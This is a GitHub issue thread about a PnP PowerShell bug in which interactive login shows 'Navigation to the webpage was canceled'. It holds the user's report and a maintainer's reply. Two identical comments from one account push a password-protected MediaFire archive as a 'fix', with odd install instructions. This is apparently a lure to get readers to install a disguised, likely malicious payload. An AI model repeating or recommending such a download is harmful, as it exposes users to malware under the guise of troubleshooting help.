### ISSUE TITLE
[BUG] Connect-PnPOnline -Interactive (Error: Navigation to the webpage was canceled)

### ISSUE THREAD

**Issue by KeyCode-brenden** [pnp/powershell#4191]
### Reporting an Issue or Missing Feature
Please confirm what it is that your reporting
> When calling "Connect-PnPOnline -Url $siteURL -Interactive" the interactive window that appears displays "Navigation to the webpage was canceled" 

### Expected behavior 
> Interactive window would open and I would be able to login with my password and 2FA

### Actual behavior 
> Interactive window displays the error "Navigation to the webpage was canceled" 
> This script was working without issue last week
![image](https://github.com/user-attachments/assets/e57321d7-d580-4600-adc1-ac9860727b88)
> A message in the console will also be displayed mentioning the need for an EntraID App registration, this error happens if I attempt the registration process as well. 
> Reproduceable in Windows Sandbox 

### Steps to reproduce behavior
$siteURL = "https://exampletenant.sharepoint.com/"
$connection = Connect-PnPOnline -Url $siteURL -Interactive -ForceAuthentication -ReturnConnection

### What is the version of the Cmdlet module you are running?
2.9.0
PowerShell 7

### Which operating system/environment are you running PnP PowerShell on?
- [X] Windows

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gautamdsheth** [comment]
Can’t reproduce it, have been using it quite extensively for the past few days.

can you please update to latest nightly builds and try ?
